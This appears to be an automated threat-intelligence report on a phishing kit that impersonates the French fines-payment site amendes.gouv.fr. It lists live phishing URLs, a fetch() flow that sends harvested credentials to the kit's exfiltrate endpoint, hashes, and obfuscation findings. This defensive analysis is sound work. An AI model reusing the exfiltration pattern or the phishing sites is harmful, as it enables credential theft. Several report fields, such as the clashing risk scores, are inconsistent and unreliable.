Phishing Analysis
Detailed analysis of captured phishing page
Visual Capture
Detection Info
http://ldmartin68.com/amendesFrance/
Detected Brand
amendes.gouv.fr
Country
International
Confidence
100%
HTTP Status
200
Report ID
bb49159e-4bbβ¦
Analyzed
2026-02-18 02:39
Final URL (after redirects)
http://ldmartin68.com/amendesFrance/infospage.php
Content Hashes (HTML Similarity)
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1C4F164626168383B427792CDBF92FF19C4E7C13BCA092C0186EC9B9D1ED5EE0D95425A |
|
CONTENT
ssdeep
|
96:IZfYIkzIoN5W4QkQC7JXntEGvEhW8jAYrZizaYO+0EtAlmTia5K2nDRA1Uebmw0r:MAI8IAbZl8l9f+0EtQmTLzeawRY |
Visual Hashes (Screenshot Similarity)
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b2b5189e199ec734 |
|
VISUAL
aHash
|
ffc3e7ffffff0000 |
|
VISUAL
dHash
|
238e8e001408acd0 |
|
VISUAL
wHash
|
9f83c3f7e7e70000 |
|
VISUAL
colorHash
|
07000000180 |
|
VISUAL
cropResistant
|
230e8e0c0c140c0c,13eae81380aed4d0,a0e0f4b4c9c9d2d0 |
Code Analysis
Risk Score
82/100
Threat Level
ALTO
β οΈ Phishing Confirmed
π£ Credential Harvester
π£ OTP Stealer
π£ Banking
π£ Personal Info
π¬ Threat Analysis Report
β’ Threat: Phishing
β’ Target: Users of amendes.gouv.fr
β’ Method: Impersonation and credential harvesting
β’ Exfil: infoz/infos.php
β’ Indicators: Domain mismatch, forms, obfuscation.
β’ Risk: HIGH
π Credential Harvesting Forms
π Obfuscation Detected
- fromCharCode
- unescape
- unicode_escape
- base64_strings
π― Kit Endpoints
- http://ldmartin68.com/amendesFrance/api/exfiltrate
π€ Form Action Targets
- infoz/infos.php
π Risk Score Breakdown
Total Risk Score
90/100
Contributing Factors
Domain Mismatch
The domain ldmartin68.com does not match the expected domain.
Impersonation
The website attempts to impersonate the French government service.
Forms and Data Collection
The page includes forms to collect personal information.
Obfuscation Detected
Code obfuscation used to hide the malicious actions.
π¬ Comprehensive Threat Analysis
Threat Type
Banking Credential Harvester
Target
amendes.gouv.fr users (International)
Attack Method
Brand impersonation + credential harvesting forms + obfuscated JavaScript
Exfiltration Channel
HTTP POST to backend
Risk Assessment
CRITICAL - Automated credential harvesting with HTTP POST to backend
β οΈ Indicators of Compromise
- Kit types: Credential Harvester, OTP Stealer, Banking, Personal Info
- 148 obfuscation techniques
π’ Brand Impersonation Analysis
Impersonated Brand
amendes.gouv.fr
Official Website
amendes.gouv.fr
Fake Service
Service de paiement en ligne des amendes
Fraudulent Claims
βοΈ Attack Methodology
Primary Method: Credential Harvesting
The phishing site uses a fake login form to steal credentials by impersonating the amendes.gouv.fr website. This involves tricking users into entering their personal information, which is then sent to the attacker.
Secondary Method: Data Exfiltration
Once the user enters the information and submits the form, the data is collected and sent to the malicious endpoint specified in the form action (infoz/infos.php).
π Infrastructure Indicators of Compromise
π¦ Malicious Files
Main File
main-es2017.8d2eb497bdf1e092bf40.js
File Size
Functions: sendData, submitForm
π Attack Flow Diagram
User fills <input name='email'> β sendData() β fetch('http://ldmartin68.com/amendesFrance/api/exfiltrate') β data sent to server
π¬ JavaScript Deep Analysis
Operator Language
English (1%)
Total Code Size
1.6Β MB
π API Endpoints Detected
Other
15
π Obfuscation Detected
- : None
- : None
- : Moderate
- : Moderate
- : Heavy
- : Heavy
- : Moderate
π€ AI-Extracted Threat Intelligence
π Attack Flow
User fills <input name='email'> β sendData() β fetch('http://ldmartin68.com/amendesFrance/api/exfiltrate') β data sent to server
π― Malicious Files Identified
Main Drainer
main-es2017.8d2eb497bdf1e092bf40.jsFile Size
45KB
Malicious Functions
sendDatasubmitForm
Similar Websites
Pages with identical visual appearance (based on perceptual hash)
République Française - ANTAI
http://antai-info-amende-non-payer.wasmer.app/wp-content/vsi...
Mar 24, 2026
amendes.gouv.fr (French Government)
https://ldmartin68.com/amendesFrance/infospage.php
Mar 15, 2026
amendes.gouv.fr (French Government)
https://serviceregulation.wasmer.app/wp-content/am/infospage...
Mar 01, 2026
amendes.gouv.fr
http://ldmartin68.com/amendesFrance
Feb 18, 2026
No screenshot
amendes.gouv.fr
http://health-coders.com.ar/app/France/infospage.php
Jan 20, 2026
Scan History for ldmartin68.com
Found 3 other scans for this domain
"I Never Thought It Would Happen to Me"
That's what 2.3 million victims say every year. Don't wait to become a statistic.